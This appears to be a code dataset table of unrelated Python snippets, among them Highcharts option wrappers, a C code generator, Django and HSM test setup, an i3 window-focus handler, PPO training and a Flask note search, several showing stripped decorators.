code stringlengths 281 23.7M |
|---|
class FrameProfilingRenderer():
    """Render an HTML profiling report for a pandas DataFrame via ydata-profiling."""

    def __init__(self, title: str = 'Pandas Profiling Report'):
        # Title shown in the header of the generated report.
        self._title = title

    def to_html(self, df: 'pd.DataFrame') -> str:
        """Build a ProfileReport for *df* and return it as an HTML string.

        Raises:
            TypeError: if *df* is not a pandas DataFrame.
        """
        # Raise explicitly instead of ``assert``: asserts vanish under ``python -O``.
        if not isinstance(df, pd.DataFrame):
            raise TypeError('df must be a pandas.DataFrame, got %s' % type(df).__name__)
        # Imported lazily so the module stays importable without ydata-profiling.
        import ydata_profiling
        profile = ydata_profiling.ProfileReport(df, title=self._title)
        return profile.to_html()
()
('--prompt', type=str, default='The quick brown fox jumps over the lazy dog.', help='The prompt to give BERT.')
('--activation', type=str, default='fast_gelu', help='Activation function applied on BERT, currently only support gelu and fast_gelu')
('--graph_mode', type=bool, default=True, help='Use CUDA graph or not. (hipGraph is not supported yet)')
('--use_fp16_acc', type=bool, default=True, help='Use fp16 accumulation or not (TensorRT is using fp16_acc)')
('--verify', type=bool, default=True, help='Verify AIT outputs against PT')
def run_demo(prompt: str, activation: str, graph_mode: bool, use_fp16_acc: bool, verify: bool):
    # Thin CLI entry point: forwards the parsed command-line options directly to
    # ``run_model`` (defined elsewhere in this module).  The option-declaration
    # lines above appear to be click/flags decorators whose ``@...`` prefixes
    # were stripped during extraction — confirm against the original source.
    run_model(prompt, activation, graph_mode, use_fp16_acc, verify) |
class OptionPlotoptionsNetworkgraphSonificationDefaultspeechoptions(Options):
    """Generated wrapper for the Highcharts
    ``plotOptions.networkgraph.sonification.defaultSpeechOptions`` options.

    Each option is exposed as a getter (returning the Highcharts default via
    ``_config_get``) and a same-named setter (recording the value via
    ``_config``).

    NOTE(review): the getter/setter pairs share one name with no decorators; in
    this generated family they are normally ``@property`` / ``@<name>.setter``
    pairs, so the decorators look stripped during extraction — as written each
    second ``def`` would silently shadow the first.  Confirm against the
    original generated source.
    """
    def activeWhen(self) -> 'OptionPlotoptionsNetworkgraphSonificationDefaultspeechoptionsActivewhen':
        # Nested sub-options object: when the speech track is active.
        return self._config_sub_data('activeWhen', OptionPlotoptionsNetworkgraphSonificationDefaultspeechoptionsActivewhen)
    def language(self):
        # Speech language; Highcharts default 'en-US'.
        return self._config_get('en-US')
    def language(self, text: str):
        self._config(text, js_type=False)
    def mapping(self) -> 'OptionPlotoptionsNetworkgraphSonificationDefaultspeechoptionsMapping':
        # Nested sub-options object: mapping of data to speech properties.
        return self._config_sub_data('mapping', OptionPlotoptionsNetworkgraphSonificationDefaultspeechoptionsMapping)
    def pointGrouping(self) -> 'OptionPlotoptionsNetworkgraphSonificationDefaultspeechoptionsPointgrouping':
        # Nested sub-options object: how points are grouped for sonification.
        return self._config_sub_data('pointGrouping', OptionPlotoptionsNetworkgraphSonificationDefaultspeechoptionsPointgrouping)
    def preferredVoice(self):
        # No default voice configured.
        return self._config_get(None)
    def preferredVoice(self, text: str):
        self._config(text, js_type=False)
    def showPlayMarker(self):
        # Default: show the play marker.
        return self._config_get(True)
    def showPlayMarker(self, flag: bool):
        self._config(flag, js_type=False)
    def type(self):
        # Track type; default 'speech'.
        return self._config_get('speech')
    def type(self, text: str):
        self._config(text, js_type=False) |
class CGenerator(object):
    """Emit C source text from a pycparser-style AST.

    Dispatch follows the visitor pattern: ``visit`` routes each node to a
    ``visit_<ClassName>`` method, defaulting to ``generic_visit``.  The
    ``c_ast`` node classes are imported elsewhere in this module.
    ``indent_level`` tracks nesting depth in steps of two spaces.
    """
    def __init__(self):
        # Current indentation width in spaces (2 per nesting level).
        self.indent_level = 0
    def _make_indent(self):
        # Whitespace prefix for the current nesting depth.
        return (' ' * self.indent_level)
    def visit(self, node):
        """Dispatch *node* to its visit_<ClassName> handler, or generic_visit."""
        method = ('visit_' + node.__class__.__name__)
        return getattr(self, method, self.generic_visit)(node)
    def generic_visit(self, node):
        """Fallback: concatenate the rendered children; '' for a None node."""
        if (node is None):
            return ''
        else:
            return ''.join((self.visit(c) for (c_name, c) in node.children()))
    def visit_Constant(self, n):
        # Constants carry their literal text verbatim.
        return n.value
    def visit_ID(self, n):
        return n.name
    def visit_ArrayRef(self, n):
        # arr[subscript]; the array expression is parenthesized if compound.
        arrref = self._parenthesize_unless_simple(n.name)
        return (((arrref + '[') + self.visit(n.subscript)) + ']')
    def visit_StructRef(self, n):
        # n.type carries the access operator itself ('.' or '->'),
        # hence the bare string concatenation.
        sref = self._parenthesize_unless_simple(n.name)
        return ((sref + n.type) + self.visit(n.field))
    def visit_FuncCall(self, n):
        fref = self._parenthesize_unless_simple(n.name)
        return (((fref + '(') + self.visit(n.args)) + ')')
    def visit_UnaryOp(self, n):
        """Render a unary operator; 'p++'/'p--' denote the postfix forms."""
        operand = self._parenthesize_unless_simple(n.expr)
        if (n.op == 'p++'):
            return ('%s++' % operand)
        elif (n.op == 'p--'):
            return ('%s--' % operand)
        elif (n.op == 'sizeof'):
            # sizeof always gets explicit parentheses around its operand.
            return ('sizeof(%s)' % self.visit(n.expr))
        else:
            return ('%s%s' % (n.op, operand))
    def visit_BinaryOp(self, n):
        # Both operands are parenthesized unless syntactically simple; no
        # operator-precedence analysis is attempted.
        lval_str = self._parenthesize_if(n.left, (lambda d: (not self._is_simple_node(d))))
        rval_str = self._parenthesize_if(n.right, (lambda d: (not self._is_simple_node(d))))
        return ('%s %s %s' % (lval_str, n.op, rval_str))
    def visit_Assignment(self, n):
        # Nested assignments on the right-hand side are parenthesized.
        rval_str = self._parenthesize_if(n.rvalue, (lambda n: isinstance(n, c_ast.Assignment)))
        return ('%s %s %s' % (self.visit(n.lvalue), n.op, rval_str))
    def visit_IdentifierType(self, n):
        # e.g. ['unsigned', 'long'] -> 'unsigned long'
        return ' '.join(n.names)
    def _visit_expr(self, n):
        """Render an expression, wrapping init lists in {} and expr lists in ()."""
        if isinstance(n, c_ast.InitList):
            return (('{' + self.visit(n)) + '}')
        elif isinstance(n, c_ast.ExprList):
            return (('(' + self.visit(n)) + ')')
        else:
            return self.visit(n)
    def visit_Decl(self, n, no_type=False):
        """Render a declaration; no_type=True emits just the name (for decl lists)."""
        s = (n.name if no_type else self._generate_decl(n))
        if n.bitsize:
            s += (' : ' + self.visit(n.bitsize))
        if n.init:
            s += (' = ' + self._visit_expr(n.init))
        return s
    def visit_DeclList(self, n):
        # First declarator keeps the type; the rest share it (int a, b, c).
        s = self.visit(n.decls[0])
        if (len(n.decls) > 1):
            s += (', ' + ', '.join((self.visit_Decl(decl, no_type=True) for decl in n.decls[1:])))
        return s
    def visit_Typedef(self, n):
        # n.storage holds the 'typedef' keyword itself (plus any others).
        s = ''
        if n.storage:
            s += (' '.join(n.storage) + ' ')
        s += self._generate_type(n.type)
        return s
    def visit_Cast(self, n):
        s = (('(' + self._generate_type(n.to_type)) + ')')
        return ((s + ' ') + self._parenthesize_unless_simple(n.expr))
    def visit_ExprList(self, n):
        visited_subexprs = []
        for expr in n.exprs:
            visited_subexprs.append(self._visit_expr(expr))
        return ', '.join(visited_subexprs)
    def visit_InitList(self, n):
        visited_subexprs = []
        for expr in n.exprs:
            visited_subexprs.append(self._visit_expr(expr))
        return ', '.join(visited_subexprs)
    def visit_Enum(self, n):
        """Render an enum, with optional tag and optional enumerator body."""
        s = 'enum'
        if n.name:
            s += (' ' + n.name)
        if n.values:
            s += ' {'
            for (i, enumerator) in enumerate(n.values.enumerators):
                s += enumerator.name
                if enumerator.value:
                    s += (' = ' + self.visit(enumerator.value))
                # Comma after every enumerator except the last.
                if (i != (len(n.values.enumerators) - 1)):
                    s += ', '
            s += '}'
        return s
    def visit_FuncDef(self, n):
        """Render a function definition; K&R param decls go between signature and body."""
        decl = self.visit(n.decl)
        # Function bodies always restart at column zero.
        self.indent_level = 0
        body = self.visit(n.body)
        if n.param_decls:
            knrdecls = ';\n'.join((self.visit(p) for p in n.param_decls))
            return (((((decl + '\n') + knrdecls) + ';\n') + body) + '\n')
        else:
            return (((decl + '\n') + body) + '\n')
    def visit_FileAST(self, n):
        """Render a whole translation unit; non-function externals get ';'."""
        s = ''
        for ext in n.ext:
            if isinstance(ext, c_ast.FuncDef):
                s += self.visit(ext)
            else:
                s += (self.visit(ext) + ';\n')
        return s
    def visit_Compound(self, n):
        """Render a braced block, indenting its statements by one level."""
        s = (self._make_indent() + '{\n')
        self.indent_level += 2
        if n.block_items:
            s += ''.join((self._generate_stmt(stmt) for stmt in n.block_items))
        self.indent_level -= 2
        s += (self._make_indent() + '}\n')
        return s
    def visit_EmptyStatement(self, n):
        return ';'
    def visit_ParamList(self, n):
        return ', '.join((self.visit(param) for param in n.params))
    def visit_Return(self, n):
        s = 'return'
        if n.expr:
            s += (' ' + self.visit(n.expr))
        return (s + ';')
    def visit_Break(self, n):
        return 'break;'
    def visit_Continue(self, n):
        return 'continue;'
    def visit_TernaryOp(self, n):
        s = (self._visit_expr(n.cond) + ' ? ')
        s += (self._visit_expr(n.iftrue) + ' : ')
        s += self._visit_expr(n.iffalse)
        return s
    def visit_If(self, n):
        s = 'if ('
        if n.cond:
            s += self.visit(n.cond)
        s += ')\n'
        s += self._generate_stmt(n.iftrue, add_indent=True)
        if n.iffalse:
            s += (self._make_indent() + 'else\n')
            s += self._generate_stmt(n.iffalse, add_indent=True)
        return s
    def visit_For(self, n):
        # Each of init/cond/next may be absent, leaving bare ';' separators.
        s = 'for ('
        if n.init:
            s += self.visit(n.init)
        s += ';'
        if n.cond:
            s += (' ' + self.visit(n.cond))
        s += ';'
        if n.next:
            s += (' ' + self.visit(n.next))
        s += ')\n'
        s += self._generate_stmt(n.stmt, add_indent=True)
        return s
    def visit_While(self, n):
        s = 'while ('
        if n.cond:
            s += self.visit(n.cond)
        s += ')\n'
        s += self._generate_stmt(n.stmt, add_indent=True)
        return s
    def visit_DoWhile(self, n):
        s = 'do\n'
        s += self._generate_stmt(n.stmt, add_indent=True)
        s += (self._make_indent() + 'while (')
        if n.cond:
            s += self.visit(n.cond)
        s += ');'
        return s
    def visit_Switch(self, n):
        s = (('switch (' + self.visit(n.cond)) + ')\n')
        s += self._generate_stmt(n.stmt, add_indent=True)
        return s
    def visit_Case(self, n):
        s = (('case ' + self.visit(n.expr)) + ':\n')
        for stmt in n.stmts:
            s += self._generate_stmt(stmt, add_indent=True)
        return s
    def visit_Default(self, n):
        s = 'default:\n'
        for stmt in n.stmts:
            s += self._generate_stmt(stmt, add_indent=True)
        return s
    def visit_Label(self, n):
        return ((n.name + ':\n') + self._generate_stmt(n.stmt))
    def visit_Goto(self, n):
        return (('goto ' + n.name) + ';')
    def visit_EllipsisParam(self, n):
        # Variadic '...' parameter.
        return '...'
    def visit_Struct(self, n):
        return self._generate_struct_union(n, 'struct')
    def visit_Typename(self, n):
        return self._generate_type(n.type)
    def visit_Union(self, n):
        return self._generate_struct_union(n, 'union')
    def visit_NamedInitializer(self, n):
        """Render a C99 designated initializer: .field = x or [idx] = x."""
        s = ''
        for name in n.name:
            if isinstance(name, c_ast.ID):
                s += ('.' + name.name)
            elif isinstance(name, c_ast.Constant):
                s += (('[' + name.value) + ']')
        s += (' = ' + self.visit(n.expr))
        return s
    def visit_FuncDecl(self, n):
        return self._generate_type(n)
    def _generate_struct_union(self, n, name):
        """Render a struct/union, with optional tag and optional member body."""
        s = ((name + ' ') + (n.name or ''))
        if n.decls:
            s += '\n'
            s += self._make_indent()
            self.indent_level += 2
            s += '{\n'
            for decl in n.decls:
                s += self._generate_stmt(decl)
            self.indent_level -= 2
            s += (self._make_indent() + '}')
        return s
    def _generate_stmt(self, n, add_indent=False):
        """Render one statement with indentation and trailing ';'/newline as needed."""
        typ = type(n)
        if add_indent:
            self.indent_level += 2
        indent = self._make_indent()
        if add_indent:
            self.indent_level -= 2
        # Expression-like nodes are bare when used as statements: add ';'.
        if (typ in (c_ast.Decl, c_ast.Assignment, c_ast.Cast, c_ast.UnaryOp, c_ast.BinaryOp, c_ast.TernaryOp, c_ast.FuncCall, c_ast.ArrayRef, c_ast.StructRef, c_ast.Constant, c_ast.ID, c_ast.Typedef, c_ast.ExprList)):
            return ((indent + self.visit(n)) + ';\n')
        elif (typ in (c_ast.Compound,)):
            # Compound blocks indent and terminate themselves.
            return self.visit(n)
        else:
            return ((indent + self.visit(n)) + '\n')
    def _generate_decl(self, n):
        """Render a declaration's funcspec/storage prefix followed by its type."""
        s = ''
        if n.funcspec:
            s = (' '.join(n.funcspec) + ' ')
        if n.storage:
            s += (' '.join(n.storage) + ' ')
        s += self._generate_type(n.type)
        return s
    def _generate_type(self, n, modifiers=[]):
        """Render a type, accumulating pointer/array/function wrappers.

        *modifiers* collects the ArrayDecl/FuncDecl/PtrDecl nodes seen on the
        way down to the TypeDecl; note the mutable default is never mutated
        (recursion builds new lists via ``modifiers + [n]``), so sharing the
        default list across calls is safe here.
        """
        typ = type(n)
        if (typ == c_ast.TypeDecl):
            s = ''
            if n.quals:
                s += (' '.join(n.quals) + ' ')
            s += self.visit(n.type)
            nstr = (n.declname if n.declname else '')
            # Wrap the declared name with the accumulated modifiers, innermost
            # first; a pointer directly inside an array/function needs parens.
            for (i, modifier) in enumerate(modifiers):
                if isinstance(modifier, c_ast.ArrayDecl):
                    if ((i != 0) and isinstance(modifiers[(i - 1)], c_ast.PtrDecl)):
                        nstr = (('(' + nstr) + ')')
                    nstr += (('[' + self.visit(modifier.dim)) + ']')
                elif isinstance(modifier, c_ast.FuncDecl):
                    if ((i != 0) and isinstance(modifiers[(i - 1)], c_ast.PtrDecl)):
                        nstr = (('(' + nstr) + ')')
                    nstr += (('(' + self.visit(modifier.args)) + ')')
                elif isinstance(modifier, c_ast.PtrDecl):
                    if modifier.quals:
                        nstr = ('* %s %s' % (' '.join(modifier.quals), nstr))
                    else:
                        nstr = ('*' + nstr)
            if nstr:
                s += (' ' + nstr)
            return s
        elif (typ == c_ast.Decl):
            return self._generate_decl(n.type)
        elif (typ == c_ast.Typename):
            return self._generate_type(n.type)
        elif (typ == c_ast.IdentifierType):
            return (' '.join(n.names) + ' ')
        elif (typ in (c_ast.ArrayDecl, c_ast.PtrDecl, c_ast.FuncDecl)):
            return self._generate_type(n.type, (modifiers + [n]))
        else:
            return self.visit(n)
    def _parenthesize_if(self, n, condition):
        """Render *n*, wrapping it in parentheses when condition(n) holds."""
        s = self._visit_expr(n)
        if condition(n):
            return (('(' + s) + ')')
        else:
            return s
    def _parenthesize_unless_simple(self, n):
        return self._parenthesize_if(n, (lambda d: (not self._is_simple_node(d))))
    def _is_simple_node(self, n):
        # "Simple" nodes never need defensive parentheses around them.
        return isinstance(n, (c_ast.Constant, c_ast.ID, c_ast.ArrayRef, c_ast.StructRef, c_ast.FuncCall)) |
class OptionSeriesAreasplinerangeDataDatalabels(Options):
    """Generated wrapper for the Highcharts
    ``series.areasplinerange.data.dataLabels`` options.

    Every option follows one pattern: a getter returning the Highcharts
    default via ``_config_get``, a same-named setter recording the value via
    ``_config``, and ``_config_sub_data`` accessors for nested option objects
    (animation, filter, textPath).

    NOTE(review): the getter/setter pairs share one name with no decorators;
    in this generated family they are normally ``@property`` /
    ``@<name>.setter`` pairs, so the decorators look stripped during
    extraction — as written each second ``def`` would silently shadow the
    first.  Confirm against the original generated source.
    """
    def align(self):
        return self._config_get('center')
    def align(self, text: str):
        self._config(text, js_type=False)
    def allowOverlap(self):
        return self._config_get(False)
    def allowOverlap(self, flag: bool):
        self._config(flag, js_type=False)
    def animation(self) -> 'OptionSeriesAreasplinerangeDataDatalabelsAnimation':
        # Nested sub-options object.
        return self._config_sub_data('animation', OptionSeriesAreasplinerangeDataDatalabelsAnimation)
    def backgroundColor(self):
        return self._config_get(None)
    def backgroundColor(self, text: str):
        self._config(text, js_type=False)
    def borderColor(self):
        return self._config_get(None)
    def borderColor(self, text: str):
        self._config(text, js_type=False)
    def borderRadius(self):
        return self._config_get(0)
    def borderRadius(self, num: float):
        self._config(num, js_type=False)
    def borderWidth(self):
        return self._config_get(0)
    def borderWidth(self, num: float):
        self._config(num, js_type=False)
    def className(self):
        return self._config_get(None)
    def className(self, text: str):
        self._config(text, js_type=False)
    def color(self):
        return self._config_get(None)
    def color(self, text: str):
        self._config(text, js_type=False)
    def crop(self):
        return self._config_get(True)
    def crop(self, flag: bool):
        self._config(flag, js_type=False)
    def defer(self):
        return self._config_get(True)
    def defer(self, flag: bool):
        self._config(flag, js_type=False)
    def enabled(self):
        return self._config_get(False)
    def enabled(self, flag: bool):
        self._config(flag, js_type=False)
    def filter(self) -> 'OptionSeriesAreasplinerangeDataDatalabelsFilter':
        # Nested sub-options object.
        return self._config_sub_data('filter', OptionSeriesAreasplinerangeDataDatalabelsFilter)
    def format(self):
        return self._config_get('point.value')
    def format(self, text: str):
        self._config(text, js_type=False)
    def formatter(self):
        return self._config_get(None)
    def formatter(self, value: Any):
        self._config(value, js_type=False)
    def inside(self):
        return self._config_get(None)
    def inside(self, flag: bool):
        self._config(flag, js_type=False)
    def nullFormat(self):
        return self._config_get(None)
    def nullFormat(self, flag: bool):
        self._config(flag, js_type=False)
    def nullFormatter(self):
        return self._config_get(None)
    def nullFormatter(self, value: Any):
        self._config(value, js_type=False)
    def overflow(self):
        return self._config_get('justify')
    def overflow(self, text: str):
        self._config(text, js_type=False)
    def padding(self):
        return self._config_get(5)
    def padding(self, num: float):
        self._config(num, js_type=False)
    def position(self):
        return self._config_get('center')
    def position(self, text: str):
        self._config(text, js_type=False)
    def rotation(self):
        return self._config_get(0)
    def rotation(self, num: float):
        self._config(num, js_type=False)
    def shadow(self):
        return self._config_get(False)
    def shadow(self, flag: bool):
        self._config(flag, js_type=False)
    def shape(self):
        return self._config_get('square')
    def shape(self, text: str):
        self._config(text, js_type=False)
    def style(self):
        return self._config_get(None)
    def style(self, value: Any):
        self._config(value, js_type=False)
    def textPath(self) -> 'OptionSeriesAreasplinerangeDataDatalabelsTextpath':
        # Nested sub-options object.
        return self._config_sub_data('textPath', OptionSeriesAreasplinerangeDataDatalabelsTextpath)
    def useHTML(self):
        return self._config_get(False)
    def useHTML(self, flag: bool):
        self._config(flag, js_type=False)
    def verticalAlign(self):
        return self._config_get('bottom')
    def verticalAlign(self, text: str):
        self._config(text, js_type=False)
    def x(self):
        return self._config_get(0)
    def x(self, num: float):
        self._config(num, js_type=False)
    def xHigh(self):
        return self._config_get(0)
    def xHigh(self, num: float):
        self._config(num, js_type=False)
    def xLow(self):
        return self._config_get(0)
    def xLow(self, num: float):
        self._config(num, js_type=False)
    def y(self):
        return self._config_get(0)
    def y(self, num: float):
        self._config(num, js_type=False)
    def yHigh(self):
        return self._config_get(0)
    def yHigh(self, num: float):
        self._config(num, js_type=False)
    def yLow(self):
        return self._config_get(0)
    def yLow(self, num: float):
        self._config(num, js_type=False)
    def zIndex(self):
        return self._config_get(6)
    def zIndex(self, num: float):
        self._config(num, js_type=False) |
.external
.parametrize('generate_type, generate_target', [('systems', 'aws'), ('systems', 'okta'), ('datasets', 'db'), ('datasets', 'bigquery'), ('datasets', 'dynamodb')])
def test_generate(test_config: FidesConfig, generate_type: str, generate_target: str, test_client: TestClient) -> None:
    """POST a /generate request and verify it succeeds with non-empty results.

    Parametrized over system/dataset targets; the fixtures and parametrize
    marks are supplied by the surrounding test module.
    """
    data = {
        'organization_key': 'default_organization',
        'generate': {
            'config': EXTERNAL_CONFIG_BODY[generate_target],
            'target': generate_target,
            'type': generate_type,
        },
    }
    response = test_client.post(
        test_config.cli.server_url + API_PREFIX + '/generate/',
        headers=test_config.user.auth_header,
        data=dumps(data),
    )
    # Assert the HTTP status *before* parsing the body: on a failed request a
    # pydantic parse error would otherwise mask the real failure.
    assert (response.status_code == 200)
    generate_response = GenerateResponse.parse_raw(response.text)
    assert (len(generate_response.generate_results) > 0)
def pytest_configure(config):
    """Configure a minimal in-memory Django settings module for the test run."""
    from django.conf import settings

    # Collected as a plain dict first so the individual settings are readable.
    test_settings = dict(
        DEBUG_PROPAGATE_EXCEPTIONS=True,
        DATABASES={'default': {'ENGINE': 'django.db.backends.sqlite3', 'NAME': ':memory:'}},
        SITE_ID=1,
        SECRET_KEY='not very secret in tests',
        USE_I18N=True,
        STATIC_URL='/static/',
        ROOT_URLCONF='tests.urls',
        TEMPLATES=[{'BACKEND': 'django.template.backends.django.DjangoTemplates', 'APP_DIRS': True, 'OPTIONS': {'debug': True}}],
        MIDDLEWARE=('django.middleware.common.CommonMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware'),
        INSTALLED_APPS=('django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.sites', 'django.contrib.staticfiles', 'rest_framework', 'rest_framework.authtoken'),
        PASSWORD_HASHERS=('django.contrib.auth.hashers.MD5PasswordHasher',),
    )
    settings.configure(**test_settings)
    django.setup()
class EspSecureHSMTestCase():
    """Test harness for HSM-backed secure-image flows using a SoftHSM2 token.

    Relies on module-level ``TEST_DIR`` / ``TOKEN_PIN`` constants and the
    ``pkcs11`` package, all defined elsewhere in this module.
    """
    def setup_class(self):
        # File handles opened via _open are tracked here and closed in teardown.
        self.cleanup_files = []
    def teardown_class(self):
        for f in self.cleanup_files:
            f.close()
    def _open(self, image_file):
        """Open a binary test image under secure_images/ and register it for cleanup."""
        f = open(os.path.join(TEST_DIR, 'secure_images', image_file), 'rb')
        self.cleanup_files.append(f)
        return f
    def get_pkcs11lib(self):
        """Return the first SoftHSM2 PKCS#11 library path found, or None."""
        # sys.maxsize > 2**32 distinguishes 64-bit from 32-bit Python (Windows DLL choice).
        if (sys.maxsize > (2 ** 32)):
            WINDOWS_SOFTHSM = 'c:/SoftHSM2/lib/softhsm2-x64.dll'
        else:
            WINDOWS_SOFTHSM = 'c:/SoftHSM2/lib/softhsm2.dll'
        LIBS = ['/usr/local/lib/softhsm/libsofthsm2.so', '/usr/lib/softhsm/libsofthsm2.so', '/usr/lib/x86_64-linux-gnu/softhsm/libsofthsm2.so', WINDOWS_SOFTHSM]
        for lib in LIBS:
            if os.path.isfile(lib):
                print('Using lib:', lib)
                return lib
        return None
    def softhsm_setup_token(self, filename, token_label):
        """Generate a 3072-bit RSA signing keypair on the token and write an HSM config file.

        Exits the process with -1 if no PKCS#11 library can be located.
        """
        self.pkcs11_lib = self.get_pkcs11lib()
        if (self.pkcs11_lib is None):
            print('PKCS11 lib does not exist')
            sys.exit((- 1))
        lib = pkcs11.lib(self.pkcs11_lib)
        token = lib.get_token(token_label=token_label)
        slot = token.slot.slot_id
        session = token.open(rw=True, user_pin=TOKEN_PIN)
        keyID = (0,)
        label = 'Private Key for Digital Signature'
        label_pubkey = 'Public Key for Digital Signature'
        # Public half: verify/encrypt/wrap capable, not private, exponent 65537.
        pubTemplate = [(pkcs11.Attribute.CLASS, pkcs11.constants.ObjectClass.PUBLIC_KEY), (pkcs11.Attribute.TOKEN, True), (pkcs11.Attribute.PRIVATE, False), (pkcs11.Attribute.MODULUS_BITS, 3072), (pkcs11.Attribute.PUBLIC_EXPONENT, (1, 0, 1)), (pkcs11.Attribute.ENCRYPT, True), (pkcs11.Attribute.VERIFY, True), (pkcs11.Attribute.VERIFY_RECOVER, True), (pkcs11.Attribute.WRAP, True), (pkcs11.Attribute.LABEL, label_pubkey), (pkcs11.Attribute.ID, keyID)]
        # Private half: sign/decrypt capable, marked sensitive and private.
        privTemplate = [(pkcs11.Attribute.CLASS, pkcs11.constants.ObjectClass.PRIVATE_KEY), (pkcs11.Attribute.TOKEN, True), (pkcs11.Attribute.PRIVATE, True), (pkcs11.Attribute.DECRYPT, True), (pkcs11.Attribute.SIGN, True), (pkcs11.Attribute.SENSITIVE, True), (pkcs11.Attribute.SIGN_RECOVER, True), (pkcs11.Attribute.LABEL, label), (pkcs11.Attribute.UNWRAP, True), (pkcs11.Attribute.ID, keyID)]
        session.generate_keypair(pkcs11.KeyType.RSA, 3072, private_template=privTemplate, public_template=pubTemplate)
        # Persist the connection details so espsecure can reach the token later.
        configfile = os.path.join(TEST_DIR, 'secure_images', filename)
        config = configparser.ConfigParser()
        section = 'hsm_config'
        config.add_section(section)
        config.set(section, 'pkcs11_lib', self.pkcs11_lib)
        config.set(section, 'credentials', TOKEN_PIN)
        config.set(section, 'slot', str(slot))
        config.set(section, 'label', label)
        config.set(section, 'label_pubkey', label_pubkey)
        with open(configfile, 'w') as c:
            config.write(c)
        session.close() |
def on_window_focus(layouts: Layouts, state: State):
    """Build the i3 ipc window-focus callback.

    The returned handler keeps the previous/current focus marks up to date and,
    when the focused workspace runs the autosplit layout, re-applies it.
    """
    def handle_focus(i3l: Connection, e: WindowEvent):
        logger.debug(f'[ipc] window focus event - container:{e.container.id}:{e.container.window}')
        ctx = state.sync_context(i3l)
        workspace_layout = layouts.get(ctx.workspace.name)
        focused = i3l.get_tree().find_focused()
        if (not is_layout_container(focused)):
            logger.debug(' [ipc] window focus event - not a layout container')
            return
        # Shift the marks: old "current" becomes "previous", focus takes "current".
        previous_mark = Mark.previous()
        current_mark = Mark.current()
        i3l.command(f'[con_mark="{current_mark}"] mark --add {previous_mark}')
        i3l.command(f'[con_id="{focused.id}"] mark --add {current_mark}')
        if (workspace_layout is None):
            logger.debug(' [ipc] window focus event - no workspace layout')
            return
        if (workspace_layout.name != LayoutName.AUTOSPLIT):
            logger.debug(' [ipc] window focus event - workspace layout not autosplit')
            return
        logger.debug(' [ipc] window focus event - update layout')
        workspace_layout.update(ctx, focused)
    return handle_focus
def train_function(n_epochs: int, distributed_env_cls) -> PPO:
    """Assemble a small CartPole PPO setup, train for *n_epochs*, return the algorithm."""
    def cartpole():
        return GymMazeEnv(env='CartPole-v0')

    # Two-worker distributed envs: one set for rollouts, one for evaluation.
    rollout_envs = distributed_env_cls([cartpole for _ in range(2)])
    eval_envs = distributed_env_cls([cartpole for _ in range(2)], logging_prefix='eval')
    # A template env provides the action/observation spaces for model setup.
    template_env = cartpole()
    dist_mapper = DistributionMapper(action_space=template_env.action_space, distribution_mapper_config={})
    policy_nets = {0: FlattenConcatPolicyNet({'observation': (4,)}, {'action': (2,)}, hidden_units=[16], non_lin=nn.Tanh)}
    critic_nets = {0: FlattenConcatStateValueNet({'observation': (4,)}, hidden_units=[16], non_lin=nn.Tanh)}
    algorithm_config = PPOAlgorithmConfig(n_epochs=n_epochs, epoch_length=2, patience=10, critic_burn_in_epochs=0, n_rollout_steps=20, lr=0.0005, gamma=0.98, gae_lambda=1.0, policy_loss_coef=1.0, value_loss_coef=0.5, entropy_coef=0.0, max_grad_norm=1.0, device='cpu', batch_size=10, n_optimization_epochs=1, clip_range=0.2, rollout_evaluator=RolloutEvaluator(eval_env=eval_envs, n_episodes=1, model_selection=None, deterministic=True))
    model = TorchActorCritic(
        policy=TorchPolicy(networks=policy_nets, distribution_mapper=dist_mapper, device=algorithm_config.device),
        critic=TorchSharedStateCritic(networks=critic_nets, obs_spaces_dict=template_env.observation_spaces_dict, device=algorithm_config.device, stack_observations=False),
        device=algorithm_config.device)
    algo = PPO(rollout_generator=RolloutGenerator(rollout_envs), algorithm_config=algorithm_config, evaluator=algorithm_config.rollout_evaluator, model=model, model_selection=None)
    algo.train()
    return algo
def test_input_stream():
    """Pipe lipsum text into the CLI and check each rendered frame came from the input.

    The CLI repaints in place using carriage returns, so splitting the output
    on '\r' yields the successive frames.
    """
    with open('tests/lipsum.txt', 'r') as fin:
        data = fin.read()
    runner = CliRunner()
    result = runner.invoke(cli, ['-s', '0'], input=data)
    assert (result.exit_code == 0)
    lines = iter(result.output.split('\r'))
    filt = []
    (prev, curr) = (None, next(lines))
    # Keep each frame that is strictly longer than its successor — i.e. the
    # "complete" frames about to be overwritten by a shorter repaint.  The
    # scan stops at the first empty frame.
    while curr:
        if (prev and (len(curr) < len(prev))):
            filt.append(prev)
        try:
            (prev, curr) = (curr, next(lines))
        except StopIteration:
            curr = None
    for line in filt:
        # The first physical line of every kept frame must appear in the input.
        assert (line.split('\n')[0] in data) |
('/search')
def search_notes():
    """Render the search page with the authenticated user's matching notes.

    Anonymous users (and requests without a ``query`` argument) get an empty
    result list.  Results are capped at 100 notes.
    """
    notes = []
    if current_user.is_authenticated:
        raw_query = request.args.get('query', None)
        if (raw_query is not None):
            # Wrap the term in SQL LIKE wildcards for a substring match.
            like_pattern = ('%%%s%%' % str(raw_query))
            notes = (Note.query
                     .filter(Note.body.like(like_pattern), (Note.owner_id == current_user.id))
                     .limit(100)
                     .all())
    return render_template('search.html', notes=notes, current_user=current_user)
class Value(KqlNode):
    """A literal value node in a KQL AST.

    ``from_python`` is the alternate constructor that wraps a plain Python
    value in the matching node type (Null / Wildcard / Boolean / Number /
    String).
    """
    __slots__ = ('value',)
    precedence = 1

    def __init__(self, value):
        self.value = value

    # The ``cls`` first parameter marks this as an alternate constructor; the
    # ``@classmethod`` decorator was evidently lost in extraction — restored.
    @classmethod
    def from_python(cls, value):
        """Convert a Python scalar into the appropriate KQL value node."""
        if (value is None):
            return Null()
        # Wildcard detection must run before the plain-string case below.
        elif (is_string(value) and (('*' in value) or ('?' in value))):
            return Wildcard(value)
        # bool before number: bool is a subclass of int.
        elif isinstance(value, bool):
            return Boolean(value)
        elif is_number(value):
            return Number(value)
        elif is_string(value):
            return String(value)
        else:
            raise EqlCompileError('Unknown type {} for value {}'.format(type(value).__name__, value))
def regtest_generate_nblocks(nblocks: int, address: str) -> List:
    """Mine *nblocks* regtest blocks paying *address* via the node's JSON-RPC.

    Returns the list of newly mined block hashes; raises for HTTP errors.
    """
